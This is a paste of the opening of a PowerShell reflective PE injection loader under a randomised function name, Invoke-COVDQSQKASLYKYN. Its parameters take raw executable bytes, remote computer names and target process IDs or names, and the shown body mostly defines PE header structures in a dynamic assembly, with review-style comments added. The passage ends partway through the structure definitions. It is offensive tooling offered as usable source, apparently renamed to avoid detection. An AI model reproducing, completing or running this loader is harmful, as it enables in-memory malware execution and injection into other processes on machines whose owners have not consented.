bigOren

CAA

Aug 26th, 2019
  1.  
  2. function Invoke-COVDQSQKASLYKYN
  3. {
  4.  
  5. [CmdletBinding()]
  6. Param(
  7.     [Parameter(Position = 0, Mandatory = $true)]
  8.     [ValidateNotNullOrEmpty()]
  9.     [Byte[]]
  10.     $PEBytes,
  11.  
  12.     [Parameter(Position = 1)]
  13.     [String[]]
  14.     $ComputerName,
  15.  
  16.     [Parameter(Position = 2)]
  17.     [ValidateSet( 'WString', 'String', 'Void' )]
  18.     [String]
  19.     $FuncReturnType = 'Void',
  20.  
  21.     [Parameter(Position = 3)]
  22.     [String]
  23.     $ExeArgs,
  24.  
  25.     [Parameter(Position = 4)]
  26.     [Int32]
  27.     $ProcId,
  28.  
  29.     [Parameter(Position = 5)]
  30.     [String]
  31.     $ProcName,
  32.  
  33.     [Switch]
  34.     $ForceASLR,
  35.  
  36.     [Switch]
  37.     $DoNotZeroMZ
  38. )
  39.  
  40. Set-StrictMode -Version 2
  41.  
  42.  
  43. $RemoteScriptBlock = {
  44.     [CmdletBinding()]
  45.     Param(
  46.         [Parameter(Position = 0, Mandatory = $true)]
  47.         [Byte[]]
  48.         $PEBytes,
  49.  
  50.         [Parameter(Position = 1, Mandatory = $true)]
  51.         [String]
  52.         $FuncReturnType,
  53.  
  54.         [Parameter(Position = 2, Mandatory = $true)]
  55.         [Int32]
  56.         $ProcId,
  57.  
  58.         [Parameter(Position = 3, Mandatory = $true)]
  59.         [String]
  60.         $ProcName,
  61.  
  62.         [Parameter(Position = 4, Mandatory = $true)]
  63.         [Bool]
  64.         $ForceASLR
  65.     )
  66.  
    Function Get-Win32Types
    {
        <#
        .SYNOPSIS
        Emits, into an in-memory dynamic assembly, the PE and Win32 value types the loader
        needs to walk the caller-supplied $PEBytes (DOS header, NT headers, section table,
        base relocations, import/export directories) and to adjust token privileges.

        .OUTPUTS
        A System.Object with one NoteProperty per emitted type (MachineType, MagicType,
        SubSystemType, DllCharacteristicsType, IMAGE_DATA_DIRECTORY, IMAGE_FILE_HEADER,
        IMAGE_OPTIONAL_HEADER64/32, IMAGE_NT_HEADERS64/32, IMAGE_DOS_HEADER,
        IMAGE_SECTION_HEADER, IMAGE_BASE_RELOCATION, IMAGE_IMPORT_DESCRIPTOR,
        IMAGE_EXPORT_DIRECTORY, LUID, LUID_AND_ATTRIBUTES, TOKEN_PRIVILEGES).

        .NOTES
        Security/review notes:
        - The sizes passed to DefineType and every SetOffset value must match the winnt.h
          layout exactly. A wrong size or offset does not fail here; it silently misreads
          header fields of an untrusted image wherever these types are later marshalled.
        - The assembly/module names ('DynamicAssembly', 'DynamicModule') and all type names
          are fixed strings. NOTE(review): presumably observable through .NET assembly-load
          telemetry; treat them as static artifacts of this loader - not verified here.
        - None of the enums carry [Flags]; DllCharacteristics in particular is a bit field.
          How (or whether) callers mask it is outside this function.
        #>
        $Win32Types = New-Object System.Object

        # Run-only (never persisted to disk) dynamic assembly that hosts every type below.
        $Domain = [AppDomain]::CurrentDomain
        $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')
        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)
        # NOTE(review): relies on GetConstructors()[0] being the MarshalAsAttribute(UnmanagedType)
        # overload; the reflection API does not guarantee constructor ordering.
        $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]

        # IMAGE_FILE_HEADER.Machine values; the loader needs I386 vs x64 to pick the 32/64-bit header types.
        $TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])
        $TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null
        $TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null
        $TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null
        $TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null
        $MachineType = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType


        # Optional-header Magic: PE32 (0x10b) vs PE32+ (0x20b).
        $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])
        $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null
        $MagicType = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType


        # Optional-header Subsystem values (winnt.h IMAGE_SUBSYSTEM_*).
        $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null
        $SubSystemType = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType


        # Optional-header DllCharacteristics bits. Note the inconsistent literal spelling
        # (IMAGE_DLL_CHARACTERISTICS_* for the first three flags vs IMAGE_DLLCHARACTERISTICS_*
        # for the rest); Get-Win32Constants defines its own IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
        # and _NX_COMPAT values, so lookups against this enum by name must use the spelling here.
        # 0x0020 (HIGH_ENTROPY_VA) and 0x4000 (GUARD_CF) are not defined; RES_* are reserved bits.
        $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])
        $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null
        $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null
        $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null
        $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null
        $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null
        $DllCharacteristicsType = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType



        # IMAGE_DATA_DIRECTORY (8 bytes): RVA + size of one data directory entry.
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)
        ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null
        ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null
        $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY


        # IMAGE_FILE_HEADER (20 bytes), sequential layout: 2+2+4+4+4+2+2.
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)
        $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null
        $IMAGE_FILE_HEADER = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER


        # IMAGE_OPTIONAL_HEADER64 (240 bytes, PE32+). Explicit offsets; note ImageBase is a
        # UInt64 at 24 (no BaseOfData) and the stack/heap sizes are 8 bytes each, which pushes
        # the 16 data directories to start at offset 112.
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)
        ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
        ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
        ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
        ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
        ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
        ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
        ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
        ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
        ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null
        ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
        ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
        ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
        ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
        ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
        ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
        ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
        ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
        ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
        ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
        ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
        ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
        ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
        ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null
        ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null
        ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null
        ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null
        # The 16 IMAGE_DATA_DIRECTORY entries, 8 bytes apart, in winnt.h order.
        ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
        ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
        ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
        ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
        ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
        ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
        ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
        ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
        ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
        ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
        ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
        ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
        ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
        ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
        ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null
        ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null
        $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64


        # IMAGE_OPTIONAL_HEADER32 (224 bytes, PE32). Differs from the 64-bit form by having
        # BaseOfData at 24, a UInt32 ImageBase at 28, and 4-byte stack/heap sizes, so the
        # data directories start at offset 96.
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)
        ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
        ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
        ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
        ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
        ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
        ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
        ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
        ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
        ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null
        ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null
        ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
        ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
        ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
        ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
        ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
        ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
        ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
        ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
        ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
        ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
        ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
        ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
        ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
        ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null
        ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null
        ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null
        ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null
        # The 16 IMAGE_DATA_DIRECTORY entries, 8 bytes apart, in winnt.h order.
        ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null
        ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null
        ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
        ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
        ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
        ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
        ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
        ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
        ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
        ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
        ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
        ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
        ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
        ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
        ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
        ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
        $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32


        # IMAGE_NT_HEADERS64 (264 bytes) = Signature(4) + IMAGE_FILE_HEADER(20) + IMAGE_OPTIONAL_HEADER64(240).
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)
        $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
        $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null
        $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64


        # IMAGE_NT_HEADERS32 (248 bytes) = Signature(4) + IMAGE_FILE_HEADER(20) + IMAGE_OPTIONAL_HEADER32(224).
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)
        $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
        $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null
        $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32


        # IMAGE_DOS_HEADER (64 bytes). e_lfanew (the last field) is the offset of the NT
        # headers within the image; the fixed-size reserved arrays are emitted as
        # [MarshalAs(UnmanagedType.ByValArray, SizeConst = n)] via CustomAttributeBuilder
        # so the struct marshals to its native width.
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)
        $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null

        # e_res: UInt16[4]. $FieldArray (the MarshalAsAttribute.SizeConst FieldInfo) is
        # computed once here and reused for e_res2 and IMAGE_SECTION_HEADER.Name below.
        $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')
        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
        $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))
        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))
        $e_resField.SetCustomAttribute($AttribBuilder)

        $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null

        # e_res2: UInt16[10].
        $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')
        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10))
        $e_res2Field.SetCustomAttribute($AttribBuilder)

        # Signed, as in winnt.h (LONG e_lfanew).
        $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null
        $IMAGE_DOS_HEADER = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER


        # IMAGE_SECTION_HEADER (40 bytes). Name is an 8-element Char[] ByValArray; with the
        # AnsiClass attribute above this marshals as 8 single-byte characters (8 + 8*4 = 40).
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)

        $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')
        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8))
        $nameField.SetCustomAttribute($AttribBuilder)

        $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
        $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER


        # IMAGE_BASE_RELOCATION (8 bytes): header of one relocation block; the UInt16
        # type/offset entries that follow it are not modelled as a type here.
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8)
        $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null
        $IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION


        # IMAGE_IMPORT_DESCRIPTOR (20 bytes). 'Characteristics' is the OriginalFirstThunk union member.
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20)
        $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null
